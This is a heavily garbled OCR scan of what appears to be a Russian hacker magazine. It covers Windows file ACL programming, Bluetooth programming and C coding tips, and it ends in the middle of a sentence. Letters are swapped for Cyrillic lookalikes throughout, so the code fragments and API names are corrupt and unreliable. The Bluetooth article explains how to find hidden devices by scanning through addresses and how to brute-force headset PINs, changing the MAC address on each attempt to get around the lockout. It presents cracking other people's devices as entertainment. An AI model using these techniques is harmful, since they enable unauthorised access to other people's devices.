зию АСІ__ВЕѴІЗІОІЧ, которая равна 2, но 
если указать 1 , то ошибки не должно быть. 
В старых версиях окон лучше не экспери- 
ментировать, а сразу указывать первую 
версию, то есть единицу. Я не проверял, 
но, возможно, при других значениях рабо- 
та примера окажется неверной. 

□ Заполняем список 

Теперь запускаем цикл перебора всех за- 
писей и копируем их в новый список, чтобы 
ничего не потерять: 

7ог і:=СИо асІІпІо.АсеСоипМ бо 

нёй 

іЩоІ(Ое1Асе(рОАСІ_ Л , і, Роіпіег(асе)))іЬепсопІіпие; 
//добавляем ее в новый список 

асе.Неабег.АсеЗіге) ібеп сопііпие; 

ЯИ 

Цикл очень прост. Сначала пытаемся по- 
лучить текущую запись. Если неудачно, то 
плюем на нее и переходим на следующий 
шаг записи. Если АСЕ получена, то добав- 
ляем ее в новый список с помощью функ- 
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> Информация по функции ІпШаІігеАсІ в 
ѴѴіпАРІ неплохая 

ции АсІсІАсе, которая в общем виде выгля- 
диттак: 

Іипсііоп АсІсІАсе( 

ИДИЬяд 

бѵѵАсеНеѵізіоп, сІѵѵЗіагііпдАсеІпсІех: ОѴѴОРЮ; 

Роіпіег;! 

пАсеЫзІІепдРі: ОѴѴОРЮ 
): ВООІ_; зісісаіі; 
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> Права доступа в ІМТРЗ 



си. В нашем случае необходимо разрешить 
все, а значит, в третьем параметре указыва- 
ем флаг ОЕІ\ІЕВІС_АІ_І_. ЗЮ пользователя 
Еѵегуопемыуже нашли, и добавление новой 
записи в АСЬсписок будет выглядеть следу- 
ющим образом: 



Инициализация обязательна, иначе де- 
скриптор будет недоступен и его нельзя бу- 
дет связать с АСЬсписком. 

У функции ІпШаІігеВесиіѣуЭезсгіріог два 
параметра: указатель на переменную де- 
скриптора и ревизия, которая должна быть 
равна константе ЗЕСиВІТѴ_ЭЕЗСВІРТОВ_ 
РЕУІЗІОЫ. В заголовочном файле эта конс- 
танта равнаединице. 

Теперь связываем дескриптор с нашим спис- 
ком с помощью функции ЗеіЗесиіѣуЭезсгіріо 
ЮасІ. У этой функции четыре параметра: 

• указатель на дескриптор, который нужно 
связать с АСЬсписком; 

• есть ли АСІ_-список. Если параметр равен 
ігие, то он есть в третьем параметре; 

• указатель на АСЬсписок, с которым про- 
исходит связь; 

• если этотпараметр равен ^гие, то АСІ_ будет 
использоваться по умолчанию. 



Туту нас 5 параметров: 

• указатель на список, в который нужно до- 
бавить запись; 

• уже знакомая нам ревизия, которая долж- 
набыть равнаАСІ__ВЕѴІЗЮІ\І; 

• позиция, в которую нужно вставить запись. 
Если указать ноль, то вставка произойдет в 
начале списка, а если указать МАХѴѴОВЭ 
— в конце списка; 

• указатель на один или несколько АСЕ-за- 
писей; 

• общий размер добавляемыхзаписей. 

□ Новая запись 

Все существующие записи мы уже скопи- 
ровали в список. Если какую-то из них ты 
хочешь удалить, то нужно правильно пе- 
ресчитать размер списка. 

Теперь нам предстоит добавить новую 
разрешающую запись, которая не сущес- 
твовала ранее. Для этого используется 
функция АббАссеззАІІоѵѵебАсе, которой 
необходимо передать указатель на спи- 
сок АСІ_, ревизию, маску прав доступа и 
идентификатор ЗЮ пользователя, кото- 
рому дается разрешение. В заголовочном 
файле ѵѵіпбоѵѵз.раз эта функция объяв- 
лена следующим образом: 

Щпсііоп АсІсІАссез5АІІоѵѵесІАсе( 

—И— 

сІѵѵАсеНеѵізіоп: ОѴѴОРЮ; 

АссеззМазк: ОѴѴОРЮ; 

ИШісІ:1 
): ВООЦ зісісаіі; 

Маску прав доступа мы рассматривали в 
прошлый раз, когда учились читать запи- 



ОЕІ\ІЕРіІС_АЦ_, зісІѴаІие) 

Для добавления запрещающей запи- 
си необходимо использовать функцию 
АббАссеззЭепіебАсе. У нее параметры 
такие же, как и у АбсІАссеззАІІоѵѵесІАсе, 
разница только в том, что указанные 
флаги доступа действуют как запреще- 
ние. Функции очень похожи внешне и 
одинаковы при вызове, поэтому не будем 
тратить свое драгоценное время на их 
рассмотрение. 

О Создание дескриптора 

Все, новый список готов, но он пока еще ни 
с чем не связан. Необходимо создать новый 
дескриптор для данного списка. Старый 
использовать не получится, потому что 
он занят. Для создания нового дескрип- 
тора заведем переменную рІМеѵѵЗЭ типа 
РЗЕСиВІТѴ_ЭЕЗСВІРТОВ. Эта переменная 
является указателем, а значит, требует вы- 
деления памяти. Сколько памяти выделить? 
Вполне достаточно минимума, который 
равен значению константы ЗЕСІ)ЯІТѴ_ 
□ЕЗСРІРТОР_МІІ\І_І_ЕІ\І(ЗТН. В моем заго- 
ловочном файле ѵѵіпбоѵѵз.раз эта константа 
равна 20-ти. После выделения памяти ини- 
циализируем дескриптор с помощью функ- 
ции ІпіііаІігеЗесигііуЭезсгіріог: 

// выделяем память под дескриптор 
рІЧеѵѵЗО := РЗЕСиН1ТУ_ОЕЗСР1РТОН(1оса1А11ос(1РТН, 
5ЕСиПІТУ_ОЕ5СРІРТОР_МІМ_І_ЕМОТН)); 

ІпіііаІігеЗесигііуОезсгіріоррМеѵѵЗО, 

ЗЕСиПІТУбОЕЗСРІРТОП_ПЕѴІЗІОІ\І); 



О Связь с файлом 

Список доступа есть (он уже связан с де- 
скриптором), осталось только назначить этот 
дескриптор файлу — и мы в шоколаде. Для 
этого используем функцию ЗеіРіІеЗесигііу, у 
которой три параметра: путь к файлу, тип из- 
меняемой информации (в нашем случае это 
ОАСЕ_ЗЕСиРІТУ_ІМРОВМАТЮМ) и новый де- 
скриптор. Воттак объявлена эта функция: 

іипсііоп 5еіРІІеЗесигііу( 

ІрРІІеЫате: РСИаг; 

а ЖеІІИИЖІІШвІо г : РзесигіІуОезсгірІог 

МИ— ВИИ 

Ура, новыйсписокназначенфайлу, итеперь 
любой пользователь может делать с ним все, 
что угодно, потому что мы дали разрешение 
с маской доступа ОЕІ\ІЕВІС_АІ_І_. 

□ Итого 

Работа с безопасностью окон — нудное и 
немного запутанное занятие. Ріо трудно не 
согласиться, что упрощать его нет смысла, 
ведь все продумано до мелочей. Другое 
дело, как эти мелочи реализованы. Ріа дан- 
ный момент система безопасности ѴѴіпбоѵѵз 
уже отлажена и при правильном подходе 
очень эффективна. 

Когда мы программно формировали новый 
список, то все АСЕ-записи банально добав- 
лялись в самый конец без сортировки. Если 
после этого войти в свойства файла и перейти 
на закладку Зесигііу, то окна предложат отсор- 
тировать список. Конечно, желательно согла- 
ситься, иначе ты можешь увидеть некоррек- 
тный список. Ріа этом завершим нашу тему. 
Удачного кодингаІІЗ-Е 
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ПРОГРАММИРОВАНИЕ 

ПОД ВШЕТООТН 

ДЛЯ ПРАВИЛЬНЫХ ЛЮДЕЙ 



НАСТОЯЩЕМУ ХАКЕРУ СИНИМ ЗУБ НУЖЕН ВОВСЕ НЕ ДЛЯ ПЕРЕКАЧИВАНИЯ 
КАРТИНОК ИЛИ ПОДКЛЮЧЕНИЯ КАКОЙ-ТО ТАМ ГАРНИТУРЫ. ХОТЯ И ЭТО НЕ- 
■ ПЛОХО :). НАСТОЯЩИЕ ВЗЛОМЩИКИ ОБОЖАЮТ ПОДБИРАТЬ ПИНЫ НА ЧУЖИХ 
ДЕВАЙСАХ, ПАЛИТЬ НЕВИДИМЫЕ УСТРОЙСТВА И ЧИНИТЬ ЗЛОДЕЯНИЯ. 

' ПОПРОБУЕМ ВЗГЛЯНУТЬ НА ЭТО ДЕЛО С ПРОГРАММЕРСКОЙ ТОЧКИ ЗРЕНИЯ. 



• • V • ’ 



!:І ігпи 



I ебудузагружатьтебятеориейпро 
то, как и для чего нужен блютус, 

I I поскольку человек, незнакомый 

с этой технологией даже на уровне поль- 
зователя, нам не друг:). Приступим сразу 
к делу. Для программирования под ВТ я вы- 
брал версию ѴізиаІ С++ 2005. Конечно же, 
никакого интерфейса мы делать не будем. 
Поэтому жми РіІе->І\Іе\/ѵ->Ргоіесіз, выбирай 
ѴізиаІ С++ и смело дави на ѴѴіп32 Сопзоіе. В 
АррІісаііопЗеіііпдз поставь галочку наЕтріу 
ргоіесіз и завершай все это дело РіпізИ’ем. 
Осталось определить, какие все-таки заго- 
ловочные файлы необходимы для ВТ-про- 
граммирования. РІам нужно подключить 
ВІиеіооіНАРІз. б: в нем содержится львиная 
доля всех функций и ЬбсІеЕ б, атакже боль- 
шое количество команд по всем функциям 
девейса (пролистать телефонную книгу, 
выйти в Іпіегпеі по протоколу ѴѴАР, вклю- 
чить музыку), и еще этот хидер управляет 
всеми доступными протоколами по ВТ. 

Для некоторых функций тебе требуется 
практикав программировании подѴѴіпбоѵѵз 
Зоскеіз (если кто забыл, напомню, что это 
средство для поддержки сетевых протоко- 
лов: они организуютсоединениеустройств, 
открывают порты, прогоняют через них 
данные). В общем, так как ѴѴіпбоѵѵз Зоскеіз 



поддерживает большинство протоколов (в 
том числе и ВІиеіооіб) в некоторых местах 
придется использовать сокеты. Иначе наши 
программы не будут стабильно работать. 

О Алгоритмируй это 

Самое главное при написании программы 
— создать алгоритм: 

1 . Подготавливаем Зоскеіз для клиента (под- 
готовка порта и буферизация данных); 

2 . Создаем Зоскеіз для ВІиеіооіН-устройств; 

2.1 Устанавливаем ВТ_АЭЭВ устройства за. 
ЬіАббг = Ь;// Ь — переменная ВТ_АЭЭЯ; 

2.2 Если с устройством возможно соеди- 
ниться, то создаем порт для передачи данных 
за. роб = сИаппеІ &0хф 

3. Собираем информацию о подключаемом 
устройстве; 

4 . Соединяемся сустройством; 

5 . Посылаем сообщение; 

6. Закрываем соединение. 

Это был первый вариант, но давай посмот- 
рим и на другой, который будет использо- 
ваться в примере про подбор РІКІ-кода. 

1 . Подготавливаем Зоскеіз для клиента; 

2 . Создаем Зоскеіз для ВІиеІооІН-устройства; 

3. Произвольно меняем свой ВТ_АЭЭР; 

4 . Соединяемся сустройством, не забыв при 
этом послать пароль; 



ЕСЛИ ПРОГРАММИСТ 
ПИШЕТ ДЛЯ СЕБЯ 
ПРОГРАММЫ, ЗНАЧИТ, 

ЕГО ЧТО-ТО 
НЕ УСТРАИВАЕТ 
В ОБЩЕДОСТУПНОМ 
СОФТЕ. 

5 . Если удаленное устройство не приняло 
пароль, то переходим ктретьему шагу; 

6. В случае, если пароль подобран, то надо 
записать в файл последний посылаемый па- 
роль наустройство и запомнить его имя; 

7 . Закрываем соединение. 

Итак, алгоритм создан, и для полноценного 
кодинга нам нужно вспомнить немного тео- 
рии, а именно: несколько главных структур, 
которые ты должен знать. 

Структура ЗОСКАЭЭЯ_ВТН определяет 
ВТН_АЭЭЯ устройство, к которому требует- 
ся приконнектиться: 

ІуресЫ зігисі _ЗОСКАООП_ВТН { 

ІІЗНОНТ асІсІгеззРатіІу; 
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ВТНЦШОВ ЫАсісіг; 

(ЗІІЮ зегѵісеСІаззІсІ; 

Ш-ОЫО рогі; 

} 50СКА00Р_ВТН, *Р80СКА00В_ВТН; 

Самое главное в этом коде то, что ВТН_АЭЭП — струк- 
тура, которая определяет имя ВІиеіооіб-устройства и 
возвращает его в ЗОСКАЭЭП_ВТН. 

Для получения более подробного теоретического ма- 
териала смотри документацию Зоскеі ѴѴіпсІоѵѵз в плат- 
форме ЗЭК, атакже не забудь про ВІиеіооІб АРІ. 

0 Ну-с, приступим! 

Кое-что важное мы уже знаем, поэтому действовать бу- 
дем по утвержденному плану. А именно: 

1 . Обнаружение устройств; 

2. Выбор устройства; 

3. Установление соединения с выбранным устройством; 

4. Авторизация на выбранном устройстве; 

5. Передача сообщения; 

6. Дисконнект. 

Для начала сделаем каркас нашего приложения, а по- 
том будем модернизировать его по своему вкусу. Лю- 
бая, даже самая вшивая сетевая программа не обой- 
дется без подобной инициализации: 

// Инициализация ѴѴІпЗоск 
ѴѴЗАРАТА ѵѵзсІ;//Код откомментировать надо 
ѴѴОВО ѵѵѴегзіопНедиезІесІ; 
ѵѵѴегзіопНедиезІеск МАКЕѴѴОРЮ (2,2); 

ІІ (ѴѴЗАЗіагіир (Ѵегзіоп,&\л/зс1)!=0) { 
ргіпЩ («ѴѴЗАЗіагіир еггоіЛп»); 
геіигп 1 ; 

1 

Этот код должен знать любой программист. Вышеопи- 
санные строки определяют структуру ѴѴЗАЭАТА и вер- 
сию, через которую мы будем прогонять все данные. 
Теперь вставим несколько функций, уже относящихся 
к самому Віиеіооіб-программированию. 

Если ты хочешь передать какую-либо информацию, 
необходимо, чтобы компьютер опознал передатчик и 
устройство, с которым требуется соединиться. Уж как 
хочешь, а без ВІиеіооіН-устройства, установленного на 
компьютере, программа работать не будет! Код до бе- 
зобразия простой: инициализируем стандартные фун- 
кции по нахождению устройства, и если таковое найде- 
но, то используем функцию ВІ_ІІЕТООТН_ПАЭІО_ІМРО 
для того, чтобы узнать об удаленном устройстве всю 
общедоступную информацию. 

//Поиск первого установленного ВІиеіооіГі-устройства 
НАШЬЕИВасІіо; 

ВШЕТООТН_ВАОІО_ІМЕО рЫгі; 

ВШЕТООТН_ЕІМО_ВАОІО_РАРІАМЗ ЬЩгр; 
НВШЕТООТН_ВАОЮ_ЕІМО ИЕІпсІ; 

ВШЕТООТН_ВАОІО_ІМЕО ВасІіоІпЬ= {0}; 



ЬЩгр. сІѵѵЗіге = зігео! (Ьіітр); 

//Определяем параметр поиска 

ГіЕіпсІ = ВІиеіооіГіЕіпсІЕІгзШасІіо (&ЬЩгр,&1пРасМо); 

//Что, если? 

(ГіЕіпсІ !=0){ 

ргіпЩ («Устройство найдено\п»); 

}еІзе{ 

ргіпЩ («Устройства нет\п»); 
геіигп 1 ; 

1 

Можно сказать, что безобидная часть нашей программы 
готова. Теперь приступаем к решительным действиям. 

О Обнаружение невидимок 

Общеизвестно, что ВІиеІооіН-устройства по желанию хо- 
зяина могут находиться в двух режимах: доступном (для 
любого внешнего обнаружения) и недоступном. По идеи 
протокола ВІиеіооФі, недоступный режим должен был ре- 
шить проблему неавторизированного доступа. Это наво- 
дит на мысль, что подобные невидимки нельзя взломать, 
но в нашем мире нет ничего совершенного, и наш будущий 
пример — тому подтверждение. 

Суть этого режима заключается в том, что на широко- 
вещательные запросы устройство не подает голоса. 
Однако если обратиться к устройству по адресу, то оно 
начнет действовать! Поэтому для начала составим про- 
граммку, которая будет последовательно перебирать 
адреса и обращаться к каждому, пока тот не откликнет- 
ся. Для начала надо сделать генерацию МАС-адреса: 

//главная функция генерации МАО 

іпі г = гапсі (); 

іДІ)ргіп«(»-»); 

ргіпЩ («%0х», г&ОхТС); 

При генерации МАС-адреса подобным методом надо 
учитывать, что разные производители мобильных теле- 
фонов имеют индивидуальные первые 3 байта МАС-ад- 
реса, так что при генерации чисел необходимо приба- 
вить те самые кусочки, чтобы идея сработала. Если тебе 
интересно знать, у каких производителей какие адреса, 
— посмотри на врезку. 

Теперь с помощью функции ВІиеіооіНАЩНепіісаіеЭ 
еѵісе обращаемся на указанный адрес устройства и 
коннектимся к нему, не забыв при этом указать пароль: 

ВІиеіооіЬАиіИепІісаІеОеѵісе (І\ІІЛ_І_, &ГіВасІіо, &рЫті, раззКеу); 

О Взлом РІЫа 

Если хорошо изучить всю документацию по использова- 
нию ВІиеІооіН-протокола, то можно выделить 2 метода 
взлома РІКІ-кода. Сейчас мы их рассмотрим и выберем ту 
технологию перебора, которая будет подходить для нас. 
Отойдя от темы, скажу, что все обозначение имен, 
функций и идентификаторов буду приводить те же, 
что и в оригинальной документации. Так что не поле- 



> Если хорошо пороешь- 
ся в старых выпусках 
журнала, то найдешь 
там статьи по описанию 
ВІиеІооШ-протокола. 

Они будут очень кстати, 
если собираешься 
глубоко изучить новую 
технологию. 




> Здесь ты найдешь 
полную информа- 
цию о соответствии 
адресов первых байт 
ВТ-устройств фирмам- 
производителям: 
ГіДр://зІапбагсІз.іеее. 
ога/геааиіИ/оиі/оиі.М. 




> Полный исходник и 
откомпилированные 
бинарникиты найдешь 
на нашем диске! 
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лесе - * * 
р* ев и<1 



по пои айгіг 
песЬ . _ - 
развив 



по пей агісіг 
пес Е ... 
равбі*І 



по пси дйеіг 
песі . . _ 
раззіді 



по п о ѵ/ айсі? 
леей . . . 
раззиЛ 



по пои асЫі* 
пес Е . - , 
раззиЛ 



раззигі : а ус Ь Ка 



>Перебор по собственному словарю дает эффективные результаты 



нись, прочти оригинальную спецификацию 
на эту тему. 

1. В самом начале сеанса простым текстом 
пересылается параметр ІІ\І_ЯАІ\Ю, который 
при помощи определенных навыков вполне 
может быть украден. Точно так же пересы- 
лается и параметр АІІ_ЯАЫ О. Если отловить 
эту информацию, то уже возможно вычис- 
лить используемый для связи РІКІ-код! Со- 
вершенно ясно, что сделать это на куске па- 
пируса невозможно, а значит, ответ прост: 
получить доступ к этим секретным данным 
можно обычным перебором РІІХІа. Таким 
образом, с определенной вероятностью 
можно восстановить используемый при со- 
единении РІІМ-код. Однако такие действия 
требуют времени. Это довольно ресурсо- 
емкая задача. Но если вспомнить, что лю- 
бой нормальный человек при использова- 
нии Ыиеіооііт не указывает РІІМы длиннее 
шести символов (а некоторые вообще его 
не используют), то можно с уверенностью 
сказать, что за секунд тридцать компьютер 
ЫоіеЬоок: 2.6 МН 2 , 512 МЬ РАМ с такой за- 
дачей справится. 

2. Иногда можно перебирать РІ N и без вся- 
ких лишних раздумий. Например, если есть 
желание воспользоваться чужой ЫиеіооІИ- 
гарнитурой, то подобрать к ней РІІ\І будет 
очень просто. Все дело в том, что у таких ус- 
тройств обычно статичный РІІ\І. Устройство 
самостоятельно реагирует на попытки под- 
ключиться к нему из-за возможности вести 
прямой перебор этого ключа. Но существует 
маленькая загвоздка: если аутентификация 
не удалась, то гарнитура не отвечает некото- 
рое время наповторныезапросы отэтого же 
устройства. 

Так вот, ничто на самом деле не мешает каж- 
дую попытку проводить от имени нового ус- 
тройства, просто меняя ВЭ_АЭЭВ. По мне, 



лучше уж описать второй метод (заодно и 
повеселишься). Генерируем РІІ\І-код и вы- 
сылаем его в поток: 

ЦоиЫе*х=пеѵѵсІоиЫе [N1], ѵѵ = 0, е = 6; 
гапсІзеЦ); 

Тог (іпТ і=0; і <14; і++){ 
х [і]=гапфго (ѵѵ, е); 
сопТ <<х [і] «епсІІ; 

1 

//а теперь высылаем полученное число 
//отсылаем пароль, если получено приглашение 
іпі ЬуІезЗепІ; 

іпі ЬуІезНесѵ = ЗОСКЕТ_ЕННОР; 
сТіаг зепсІЬи! [32] = х [і]; 
сИаг гесѵЬи![32] = «»; 

ЬуіезЗепі = зепсі (т_зоскеі, зепсІЬиІ, зТгІеп (зепсІЬиІ), 0); 
ргіпТТ ( «Отослано: %сІ\п», ЬуіезЗепі); 

//проверяем на ошибки 

ѵѵГііІе (ЬуІезРесѵ == ЗОСКЕТ_ЕННОН) 

І 

ЬуІезПесѵ = гесѵ (т_зоскеІ, гесѵЬиІ, 32, 0); 
іі (ЬуІезРесѵ == 011 ЬуІезРесѵ == ѴѴЗАЕСОІЧІМРІЕЗЕТ) 

И 

ргіпТТ ( «Соединение закрытоХп»); 

Ьгеак; 

Генерация и атака РІІМ-кодами чрезвычайно 
проста, однако есть одно маленькое «но». 
Для того чтобы перебор паролей шел в пол- 
ную силу, необходимо, чтобы после каж- 
дого запроса менялся МАС-адрес нашего 
устройства. Ну, для этого далеко ходить не 
надо: работы — всего на один цикл. Сразу 
оговорюсь, что в этом цикле используется 
шестнадцатеричная система исчисления, 
так как нам другая не подходит. 

Тог (іпТ і = 0; і < ІбМлн; і ++){ 

Тог (іпТ і = 0;і <6; \ ++){ 



іпі г = гапсі ();//случайное число от 0 до 2 Л 8-1 

ІТ (і) ргіпТТ (»-»); 

ргіпТТ («%0х» , г & 0x11); 

■ 

ргіпТТ (»\п»); 

і 

На выходе мы получим строки типа такой: 
87-Ьс-а0-0сІ-с7-І5. Но не будем забывать о 
тех первых трех байтах МАС-адреса про- 
изводителя. Просто необходимо немного 
обрезать строчку и прибавить те данные, 
которые нас интересуют. 

О Удаленное управление 

Программа ко взлому устройств готова! 
Если программист пишет для себя програм- 
мы, значит, его что-то не устраивает в обще- 
доступном софте. И какими бы мы ни были 
крутыми хакерами, надо писать и «мирный» 
софт, который будет помогать не только 
тебе, но и всем людям, интересующимся 
новыми технологиями. Поэтому давай напи- 
шем программу, которая будет нам помогать 
в повседневной жизни. 

Меня всегда интересовало удаленное уп- 
равление программами. Дело в том, что я 
большой любитель спутникового телеви- 
дения, и каждый раз переключать каналы, 
подползая к компьютеру, мне не особо нра- 
вится. В результате у меня было два вари- 
анта решения проблемы. Первое — это ку- 
питьспециальный ПДУдляЗкуЗіагі, второе 
— сделать программу с использованием 
ВІиеІооІІт. Первый вариант мне не подхо- 
дил, так как надо было отдать 500 руб, по- 
этому я решил создать блютус-модуль ко- 
торый будет удаленно управлять РгодЭѴВ, 
переключать каналы и работать со звуком. 
Я использовал простенький метод согласо- 
вания — посылку определенной команды: 
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> Документацию по новым технологиям должен иметь каждый 
уважающий себя программист 



она загружается в программу, та, в свою оче- 
редь, обрабатывает ее и делаетто, что тобою 
будет запрограммировано. У меня это: 2-Ка- 
нал вверх; 8-Канал вниз; 4-Звук тише; 6-Звук 
громче. Все просто и понятно. Проблема со- 
стоит только в том, что я вообще никогда не 
программировал под мобильныетелефоны. 
Создадим новый проект, загрузим все не- 
обходимые подключаемые файлы, запишем 
инициализацию ѴѴіпсІоѵѵз Зоскеіз и иденти- 
фикацию устройства (на всякий случай). В 
этой части у нас будет всего несколько новых 
функций. Прошулюбить и жаловать: 



ВІиеІооШЗфЗеІЕІеітіепІ 
Ьаіа 

ВІиеІооІЬЗфѲеіЗігіпд 

Обе эти функции чем-то 
похожи, выполняют 
одну и ту же задачу: получают и анализируют 
поток данных по ЗЭР. Между ними есть толь- 
ко одно маленькое отличие: вторая функция 
может работать с ІІІМІССЮЕ. Вперед, на вин- 
ные погреба! 

ОѴѴОРЮ ВІиеіооіІпЗфОеіЕІетепЮаіа (ЬРВУТЕ 
рЗфЗігеат, ІІШІЧѲ сЬЗрсІЗігеаітіІ_епдіІі, РЗРР_ 
Й-ЕМЕ1\1Т_РАТА р РаГа) ; 

ВІиеІооІНЗсІрѲеІЕІетепЮаІа передает 3 
параметра: 

1. Порт входа ЗОР; 



2. Длина потока в байтах; 

3. Отправка\обработка команды ЗОР- 
элемента, данные не должны превышать 
рЗсІрЗігеат. 

Процесс согласования команд телефон- 
жомпьютер здесь приводить не буду, пос- 
кольку он длинный и банальный, так что 
ищи сорец на компакт-диске. 

□ Вот и все 

Теперь-то мы знаем, как с помощью ѴѴіпсІоѵѵз 
Зокеіз & ЗОК ВІиеіооіН накодить приложе- 
ния, которые будут соответствовать нашим 
требованиям. За тобой — дальнейшее раз- 
витие этой идеи. Например, можешь сделать 
перебор паролей по словарю, многопоточ- 
ность — это повысит скорость перебора — и 
многое другое. Если тебя что-то не получает- 
ся — пиши. Удачного компилирования! ИЛ 




ДОСТУП ® ИНТЕРНЕТ 
по выделенному КАНАЛУ 
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Мбит 
в сек 



в г Г/ОСК&Е 
И МОСКОВСКОЙ збл 
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Специальное предложение! 

СКИДКА* НА ПОДКЛЮЧЕНИЕ 

Подключение - от 40 у.е. 

Минимальная месячная плата - 5 у.е. 

Срок подключения - 14 дней (для Москвы) 

Специальные скидки для абоношоэ в жилых домах 

Организация виртуальных частных сетей (ѴРМ) 

Круглосуточная техническая поддержка 

Аренда оборудования для абонентов - бесплатно 

Виртуальный и физический хостинг 

ѴѴе Ь-серееро в - трафик не ограничен 

Электронная почта для абонентов - бесплатно 

'действуют ограянчення 



виртуозное 

исполнение 






«ЗАЧЕМ ТЕБЕ МОЗГИ? ПРОГРАММИРУЙ! БЕРИ, СОБИРАЙ ФОРМЫ, ПИШИ НЕЭФФЕКТИВНЫЙ КОД, И ПУСТЬ НАРОД ДОКУ- 
ПИТ ЕЩЕ ПАРОЧКУ ПЛАНОК ПАМЯТИ. ЧТО, НЕ ХОЧЕШЬ? ТОГДА ЭТА РУБРИКА, КАК ВСЕГДА, ОБОГАТИТ ТЕБЯ СВЕЖИМИ 
ИДЕЯМИ ОПТИМИЗАЦИИ КОДА :).» 



01 



СТРОКИ В НЕХ-ЧИСЛАХ 

Допустим, нам потребовалось 
прочитать значение ячейки 
памяти некоторого процесса 
и вывести ее на экран. Или распечатать де- 
скриптор заданного окна. Да все что угодно! 
Суть в том, что в программах, написанных 
«под себя» это обычно делается так: 



Иргіп^С'ІіѴѴпсІ: %ХГі\п", РіпсІѴѴІпсІоѵѵф, "Калькулятор"))! 



если на тачке установлен целый гектар, то 
отдельные байты можно уже и не считать?! 
Некоторые, попытавшись неумело схитрить, 
преобразовывают ГіѴѴпсІ в строку посредст- 
вом нестандартной функции _іФа(), поддер- 
живаемой МісгозоЙ ѴС++, но отсутствую- 
щей во многих других компиляторах. В этом 
случае для вывода значения дескриптора 
требуется всего лишь один вызов ргіп^О, да 
и сама программа становится прозрачнее: 



Если же искомое окно отсутствует, то фун- 
кция РіпсіѴѴіпсіо\а/з() возвратит ошибку, и 
на экране появится « ГіѴѴпсІ : Об». Нормаль- 
ные хакеры знают, что такого дескрипто- 
ра в природе не существует, и это символ 
ошибки, но все равно получается как-то 
неаккуратно и «некультурно». Лучше, 
чтобы программа сообщала об этом явно. 
Проще всего использовать условный пе- 
реход типа: 



|сЬаг 1311^12]; // 12 байт хватит для любого числа^Д 

Программа стала более наглядной, но все 
равно это не по-хакерски и слишком пря- 
молинейно. А что если подобрать такую 
шестнадцатеричную константу, которая 
бы читалась как осмысленное текстовое 
слово? Например, ВАЭРі. 



[НУУЫР ИѵѵпсІ = РіпЦѴѴІпсіоѵѵ(0, "Калькулятор")! 





Однако все это слишком по-медвежьи как- 
то. Слишком прямолинейно, а прямолиней- 
ность для хакеров непростительна! К тому 
же нам потребовалось целых три вызова 
функции ргіп^О вместо одного. Ты думаешь, 



[НУУЫР ГіѵѵпсІ = РіпЦѴѴІпсІо\л/(0, "Калькулятор")| 
ргіпіД"Гі\Л/псІ: %ХИ\п ", (Іп\л/пЩ?(іпІ)ЬѵѵпсІ:ОхВАР) 

Исходный текст упростился до предела, 
оставшись наглядным и понятным даже 
обычным, «ванильным» программистам, 
которые, кроме прикладных программ, 
ничего другого писать не умеют. 
Разумеется, данную методику можно при- 
менять не только с дескрипторами окон, 
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но и вообще с любыми возвращаемыми 
значениями, какс АРІ-функциями, таки со 
своими собственными. Причем своя соб- 
ственная функция запросто может сде- 
лать геіигп ОхВАЭ в случае ошибки. И тогда 
вместо проверки в стиле іі (Фо()! = ЕРРОР) 
мы будем писать іі (Фо()!=0хВАЭ). Заметь, 
это намного «элегантнее», и не потому, что 
ОхВАЭ короче ЕРРОР (оба они одинаковы 
подлине), а потому, что при записи резуль- 
тата в лог (ты ведешь отладочные логи, 
верно?) отпадает необходимость преоб- 
разования численного кода ошибки в его 
строковое представление. 

Кроме ОхВАЭ, существуют и другие ком- 
бинации — например, ОхЭЕАЭВЕЕР, ОхЭЕ 
АЭА11, ОхРАІІ ЕЭ, да много всего можно 
придумать! 




ЛОКАЛЬНЫЕ ПЕРЕ- 
МЕННЫЕ КОЛЛЕКТИВ- 
НОГО ИСПОЛЬЗОВА- 

ния 



Этикет программирования ограничива- 
ет предельно разумную длину функций 
несколькими сотнями строк, рекомендуя 
дробить функции на элементарные функ- 
циональные единицы, которые проще отла- 
живать, да и компилируются они быстрее. 
Но это теоретически. Практически же, при 
«расщеплении» одной большой функции на 
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несколько маленьких возникает проблема 
с разделом локальных переменных. Да, мы 
можем обособить фрагмент большой функ- 
ции в отдельный функциональный фраг- 
мент, но при этом он потянет за собой мно- 
жество неявных аргументов — например, 
флагов, управляющих отладочным выво- 
дом, дескрипторов файлов, окон, элемен- 
тов управления, да мало ли еще что! 
Конечно, можно передать все необходимые 
переменные через аргументы, но это будет 
медленно, неэлегантно и ктому же потребу- 
етуйму ручной работы. В С++ эта проблема 
стоит не так остро, поскольку там все функ- 
ции-члены класса могут разделять одни и 
те же переменные. Но с ростом размеров 
класса количество разделяемых перемен- 
ных возрастает, порождая путаницу, хаос, 
беспорядок и вытекающие отсюдаошибки. 
А что если все локальные переменные за- 
гнать в структуру, передаваемую всем род- 
ственным функциям (по ссылке, конечно, 
чтобы они могли менятьзнания какзаблаго- 
рассудится). Например: 



і\ ад^іе^оНідО^ІеЬид^и^ 

Тог (а = 0; а < 0x669; а++) {| 

< л = а л (0-а);іТ (Лад) ргіпіТ("%сІ\п", х); 

л = х + а » ( а & ОхР); іТ (Лад) ргіп!Т("%сІ\п", у): 



Допустим, мы хотим разбить функцию Тоо() 
на две или даже натри, чтобы улучшить чита- 
емость листинга. В классическом варианте 
это будет выглядеть так: 



Данный пример не выглядит ужасно только 
потому, что код «раскулачиваемой» функ- 
ции Тоо() сравнительно невелик, да и пере- 
менныхтам мало. Но все-таки.... Попробуем 
их загнать в структуру? 





іЬт.сот/ігІ/ргоіесіз/зесигііѵ/ззрЛ . — это са- 
мый сложный и совершенный механизм, 
реализующий модель безопасного стека 
(ЗаТе Зіаск ІІзаде МобеІ), главной инноваци- 
ей которого является переупорядочивание 
локальных переменных. Рго-роіісе разбива- 
етпеременные надве группы: массивы и все 
остальные. На вершину карда стека попада- 
ют обычные (скалярные) переменные. Мас- 
сивы идутза ними. Переполняющиеся буфе- 
ры могут воздействовать друг на друга, но 
до указателей им уже не достать, во всяком 
случае, не таким простым путем. К сожале- 
нию, Рго-роіісе работаеттолько с компилято- 
ром ССС, а всем остальным остается только 
сосать лапу и в остервенении грызть свой 
хвост, или. . . воспользоваться структурами. 
Дело в том, что размещение локальных пе- 
ременных в памяти может и не совпадать с 
порядком их объявления в программе, по- 
этому у нас нет никаких гарантий, что пе- 
ременные риз окажутся расположенными 
выше локальных буферов: 




В данном случае преимущество не столь 
очевидно, но в больших проектах оно дает 
о себе знать! А что насчетэффективности?! 
Не снижается ли она за счет постоянных опе- 
раций типа «1->а»? Отнюдь! Современные 
